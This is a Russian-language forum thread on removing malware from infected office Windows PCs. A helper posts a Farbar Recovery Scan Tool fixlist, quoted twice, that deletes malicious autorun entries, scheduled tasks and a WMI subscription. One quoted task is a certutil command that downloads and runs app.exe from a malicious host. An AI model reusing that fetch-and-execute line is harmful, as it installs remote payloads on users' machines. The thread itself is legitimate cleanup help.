Перейти к содержанию

Рекомендуемые сообщения

Здравствуйте. На работе какая-то часть компьютеров была заражена вирусом. Каждый описываю в разной теме                                                                                                                                                        
Проверял CureIt - ничего.
В случае с Windows 7 срабатывает AVG, что оборвано соединение с newscommer.com/.../app.exe , после чего падает explorer
на компах с семеркой где нету AVG просто начинает очень глючить, некоторые окна сами закрываются, иногда тоже падает explorer.
 

Addition.txt

CollectionLog-2019.03.20-09.45.zip

FRST.txt

Ссылка на сообщение
Поделиться на другие сайты
Вы из Чернигова?

 

 

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

 


  • Временно выгрузите антивирус и прочее защитное ПО.


  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:



CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-1479051576-220921612-758469502-1000\...\Run: [DivineTree] => C:\Windows\rss\csrss.exe [4921344 2019-03-20] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-1479051576-220921612-758469502-1000\...\Run: [CloudNet] => C:\Users\Bux-123\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-03-20] (EpicNet Inc.) [File not signed] <==== ATTENTION
R2 WinDefender; C:\Windows\windefender.exe [0 ](Access Denied)<==== ATTENTION (Access Denied)
2019-03-20 09:41 - 2019-03-20 09:52 - 000003504 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2019-03-20 09:41 - 2019-03-20 09:52 - 000003184 _____ C:\Windows\System32\Tasks\csrss
Task: {0FFCD5DD-BB55-4177-9E1B-E055D3E89CB6} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe () [File not signed] <==== ATTENTION
Task: {595F1E97-BA1A-4608-8A79-EEFA5C86C179} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://nadequalif.club/app/app.exe C:\Users\Bux-123\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Bux-123\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
zip:C:\FRST\Quarantine



  • Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!


  • Обратите внимание, что компьютер будет перезагружен.


  • Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму

 

 


Ссылка на сообщение
Поделиться на другие сайты

 

Вы из Чернигова?
 
 
ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!
 
  • Временно выгрузите антивирус и прочее защитное ПО.
  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-1479051576-220921612-758469502-1000\...\Run: [DivineTree] => C:\Windows\rss\csrss.exe [4921344 2019-03-20] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-1479051576-220921612-758469502-1000\...\Run: [CloudNet] => C:\Users\Bux-123\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-03-20] (EpicNet Inc.) [File not signed] <==== ATTENTION
R2 WinDefender; C:\Windows\windefender.exe [0 ](Access Denied)<==== ATTENTION (Access Denied)
2019-03-20 09:41 - 2019-03-20 09:52 - 000003504 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2019-03-20 09:41 - 2019-03-20 09:52 - 000003184 _____ C:\Windows\System32\Tasks\csrss
Task: {0FFCD5DD-BB55-4177-9E1B-E055D3E89CB6} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe () [File not signed] <==== ATTENTION
Task: {595F1E97-BA1A-4608-8A79-EEFA5C86C179} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://nadequalif.club/app/app.exe C:\Users\Bux-123\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Bux-123\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
zip:C:\FRST\Quarantine
  • Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  • Обратите внимание, что компьютер будет перезагружен.
  • Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму
 
 

 

да, Чернигов, а что?

Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

  • Похожий контент

    • Loomit
      От Loomit
      Здравствуйте. На работе какая-то часть компьютеров была заражена вирусом. Каждый описываю в разной теме                                                                                                                                                        
      Проверял CureIt - ничего.
      Точно также как и с семеркой, срабатывает AVG, что оборвано соединение с newscommer.com/.../app.exe , после чего падает explorer
      Addition.txt
      CollectionLog-2019.03.20-09.35.zip
      FRST.txt
    • Loomit
      От Loomit
      Здравствуйте. На работе какая-то часть компьютеров была заражена вирусом. Каждый описываю в разной теме                                                                                                                                                        
      Проверял CureIt - ничего.
      В случае с Windows 7 срабатывает AVG, что оборвано соединение с newscommer.com/.../app.exe , после чего падает explorer
      на компах с семеркой где нету AVG просто начинает очень глючить, некоторые окна сами закрываются, иногда тоже падает explorer.
      Addition.txt
      CollectionLog-2019.03.20-11.24.zip
      FRST.txt
    • Loomit
      От Loomit
      Здравствуйте. На работе какая-то часть компьютеров была заражена вирусом. Каждый описываю в разной теме                                                                                                                                                        
      Проверял CureIt - ничего.
      В случае с Windows 7 срабатывает AVG, что оборвано соединение с newscommer.com/.../app.exe , после чего падает explorer
      на компах с семеркой где нету AVG просто начинает очень глючить, некоторые окна сами закрываются, иногда тоже падает explorer.
      Addition.txt
      CollectionLog-2019.03.20-09.15.zip
      FRST.txt
    • Loomit
      От Loomit
      Здравствуйте. На работе какая-то часть компьютеров была заражена вирусом. Каждый описываю в разной теме                                                                                                                                                        
      Проверял CureIt - ничего.
      В случае с Windows 7 срабатывает AVG, что оборвано соединение с newscommer.com/.../app.exe , после чего падает explorer
      на компах с семеркой где нету AVG просто начинает очень глючить, некоторые окна сами закрываются, иногда тоже падает explorer.
      Addition.txt
      CollectionLog-2019.03.20-09.24.zip
      FRST.txt
    • Loomit
      От Loomit
      Здравствуйте. На работе какая-то часть компьютеров была заражена вирусом. Каждый описываю в разной теме                                                                                                                                                        
      Проверял CureIt - ничего.
      В случае с Windows 7 срабатывает AVG, что оборвано соединение с newscommer.com/.../app.exe , после чего падает explorer
      на компах с семеркой где нету AVG просто начинает очень глючить, некоторые окна сами закрываются, иногда тоже падает explorer.
      Addition.txt
      CollectionLog-2019.03.20-10.10.zip
      FRST.txt
×
×
  • Создать...